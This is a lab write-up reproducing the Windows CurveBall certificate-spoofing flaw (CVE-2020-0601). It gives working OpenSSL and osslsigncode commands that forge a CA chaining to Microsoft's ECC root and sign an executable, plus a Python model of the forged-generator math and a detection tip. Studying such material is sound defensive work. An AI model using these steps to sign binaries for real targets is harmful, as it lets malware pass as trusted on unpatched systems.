
Windows certificate vulnerability CVE-2020-0601 (CurveBall)

Affected versions:

Windows 10

Windows Server 2016/2019

Any application that relies on the Windows CryptoAPI (crypt32.dll) to validate certificates

The flaw: when validating an ECC certificate, CryptoAPI matched the signing key against a cached trusted root by public key alone and did not check that the certificate's explicit curve parameters (in particular the generator point) were the ones the root was actually issued with. An attacker can therefore choose any private key, derive a generator that yields the real root's public key, and sign certificates (code signing, TLS, ...) that Windows chains to the genuine Microsoft root.

Viewing the Windows certificate store

Open the local certificate store: press Win+R and run certmgr.msc.

[Screenshot: certmgr.msc certificate manager]

Under the trusted root store you can see the ECC-signed root certificates that ship with the system; export one of them (the steps below use Microsoft ECC Product Root Certificate Authority):

[Screenshots: exporting the root certificate]

Double-click the certificate to see its details (in particular the public key and the ECC curve):

[Screenshot: certificate details]

Reproduction:

// Install Ruby (needed for the main.rb script from the CurveBall repository)
a@a-virtual-machine:~$ sudo apt install ruby
// If apt complains that the lock is held by another process:
// ps -A | grep apt              list the running apt processes
// sudo kill -9 <pid>            kill the offending process
// Generate spoofed_ca.key: an ECC private key with explicit curve parameters whose generator
// is computed from the exported root certificate so that the derived public key equals the real root's
a@a-virtual-machine:~/CurveBall-master$ ruby main.rb ./MicrosoftECCProductRootCertificateAuthority.cer
// Generate spoofed_ca.crt: a self-signed CA certificate for the spoofed key.
// The two .rnd lines are a harmless OpenSSL 1.1.0 warning about a missing seed file.
a@a-virtual-machine:~/CurveBall-master$ openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt
Can't load /home/a/.rnd into RNG
140535782355392:error:2406F079:random number generator:RAND_load_file:Cannot open file:../crypto/rand/randfile.c:88:Filename=/home/a/.rnd
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:aa
State or Province Name (full name) [Some-State]:aa
Locality Name (eg, city) []:aa
Organization Name (eg, company) [Internet Widgits Pty Ltd]:aa
Organizational Unit Name (eg, section) []:aa
Common Name (e.g. server FQDN or YOUR name) []:aa
Email Address []:aa
// Generate cert.key: the private key for the leaf (code-signing) certificate, on P-384
a@a-virtual-machine:~/CurveBall-master$ openssl ecparam -name secp384r1 -genkey -noout -out cert.key
// Generate cert.csr, using the openssl_cs.conf shipped in the repository to request the v3_cs code-signing extensions
a@a-virtual-machine:~/CurveBall-master$ openssl req -new -key cert.key -out cert.csr -config openssl_cs.conf -reqexts v3_cs
// Sign the CSR with the spoofed CA to produce the leaf certificate cert.crt
a@a-virtual-machine:~/CurveBall-master$ openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_cs.conf -extensions v3_cs
Signature ok
subject=C = DK, ST = Denmark, L = Copenhagen, O = ollypwn, CN = ollypwn
Getting CA Private Key
// Bundle the leaf certificate, its key and the spoofed CA certificate into cert.p12
a@a-virtual-machine:~/CurveBall-master$ openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed_ca.crt -name "Code Signing" -out cert.p12
Enter Export Password:
Verifying - Enter Export Password:
// Sign an executable with cert.p12 using osslsigncode (Authenticode signing from Linux)
a@a-virtual-machine:~/CurveBall-master$ osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in python.exe -out python_signed.exe

Command 'osslsigncode' not found, but can be installed with:

sudo apt install osslsigncode

a@a-virtual-machine:~/CurveBall-master$ sudo apt install osslsigncode
[sudo] password for a:
Reading package lists... Done
// Second attempt: the input is now the 7-Zip installer 7z1900-x64.exe, but the output file name
// python_signed.exe was kept from the first command
a@a-virtual-machine:~/CurveBall-master$ osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in 7z1900-x64.exe -out python_signed.exe
Succeeded
Copy python_signed.exe to the Windows machine and inspect its signature in the file properties.

[Screenshots: the signed executable on the Windows side]

On an unpatched system the signature chains to the genuine Microsoft root because crypt32 matches the root by public key only. On a system with the January 2020 security update installed, the same file is reported as having an invalid signature, and crypt32 records the attempt in the Application event log as Event ID 1 from source Audit-CVE, which is the event to alert on when hunting for CurveBall exploitation.
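The arithmetic that main.rb performs on the exported root certificate, written out as an added example (this is not code from the original post or from the CurveBall repository). It uses the real NIST P-384 parameters, but the root key pair, the attacker's private key, the nonce and the message are constructed for the demo; the two chain-check functions are a simplified model of the pre-patch and post-patch crypt32 behaviour, not Microsoft's code. The example shows that with a chosen private key d' and the forged generator G' = d'^-1 * Q, signatures made under d' verify against the real root public key Q as long as the verifier takes the generator from the certificate instead of from the trusted root.

```python
import hashlib

# NIST P-384 domain parameters (the curve used by the Microsoft ECC Product Root CA).
P = 2**384 - 2**128 - 2**96 + 2**32 - 1
A = P - 3
B = 0xb3312fa7e23ee7e4988e056be3f82d19181d9c6efe8141120314088f5013875ac656398d8a2ed19d2a85c8edd3ec2aef
N = 0xffffffffffffffffffffffffffffffffffffffffffffffffc7634d81f4372ddf581a0db248b0a77aecec196accc52973
G = (0xaa87ca22be8b05378eb1c71ef320ad746e1d3b628ba79b9859f741e082542a385502f25dbf55296c3a545e3872760ab7,
     0x3617de4a96262c6f5d9e98bf9292dc29f8f41dbd289a147ce9da3113b5f0b8c00a60b1ce1d7e819d7a431d7c90ea0e5f)
INF = None  # point at infinity


def is_on_curve(pt):
    if pt is INF:
        return True
    x, y = pt
    return (y * y - (x * x * x + A * x + B)) % P == 0


def point_add(p1, p2):
    """Affine addition (and doubling) on y^2 = x^3 + A*x + B over GF(P)."""
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return INF  # p1 == -p2
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def scalar_mult(k, pt):
    """Plain double-and-add (no side-channel hardening; demo only)."""
    result, addend = INF, pt
    while k:
        if k & 1:
            result = point_add(result, addend)
        addend = point_add(addend, addend)
        k >>= 1
    return result


def forge_generator(root_pub, attacker_priv):
    """CurveBall core: for a chosen d', return G' = d'^-1 * Q so that d' * G' = Q."""
    return scalar_mult(pow(attacker_priv, -1, N), root_pub)


def hash_to_int(msg):
    return int.from_bytes(hashlib.sha384(msg).digest(), "big")


def ecdsa_sign(msg, priv, gen, k):
    """Textbook ECDSA over an arbitrary generator. k is fixed by the caller for a
    reproducible demo; a real signer must draw it fresh and uniformly every time."""
    z = hash_to_int(msg)
    r = scalar_mult(k, gen)[0] % N
    s = pow(k, -1, N) * (z + r * priv) % N
    return (r, s)


def ecdsa_verify(msg, sig, pub, gen):
    r, s = sig
    if not (0 < r < N and 0 < s < N):
        return False
    z, w = hash_to_int(msg), pow(s, -1, N)
    pt = point_add(scalar_mult(z * w % N, gen), scalar_mult(r * w % N, pub))
    return pt is not INF and pt[0] % N == r


def vulnerable_chain_check(root_pub, cert_params, msg, sig):
    """Model of pre-patch crypt32 (assumption): the trusted root is matched on the public key
    alone, and the signature is checked with the generator supplied by the certificate."""
    if cert_params["pub"] != root_pub:
        return False
    return ecdsa_verify(msg, sig, cert_params["pub"], cert_params["gen"])


def patched_chain_check(root_pub, cert_params, msg, sig):
    """Model of the fix: the certificate's curve parameters must match the ones the root
    was enrolled with (here the standard generator G); otherwise the chain is rejected."""
    if cert_params["pub"] != root_pub or cert_params["gen"] != G:
        return False
    return ecdsa_verify(msg, sig, root_pub, G)


def demo():
    root_priv = 0xC0FFEE1234567890ABCDEF  # constructed stand-in for the real root's private key
    root_pub = scalar_mult(root_priv, G)   # in practice Q is parsed out of the exported .cer file
    attacker_priv = 0x2A                   # any value the attacker likes; root_priv is never used again
    g_prime = forge_generator(root_pub, attacker_priv)
    spoofed_params = {"pub": root_pub, "gen": g_prime}  # what spoofed_ca.key carries as explicit parameters
    msg = b"TBS bytes of a leaf certificate (constructed)"
    sig = ecdsa_sign(msg, attacker_priv, g_prime, k=0x1234567890ABCDEF)
    return {
        "pub_matches": scalar_mult(attacker_priv, g_prime) == root_pub,
        "vulnerable_accepts": vulnerable_chain_check(root_pub, spoofed_params, msg, sig),
        "patched_accepts": patched_chain_check(root_pub, spoofed_params, msg, sig),
    }


if __name__ == "__main__":
    print(demo())
```

The forged generator lies on the same curve as the real one, so a verifier cannot tell the two apart by curve membership alone; it has to compare the full parameter set of the trusted root (or, better, refuse explicit parameters and accept only named curves), which is what the patched check models.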

References:

https://github.com/ollypwn/CurveBall

https://blog.csdn.net/Eastmount/article/details/104335673
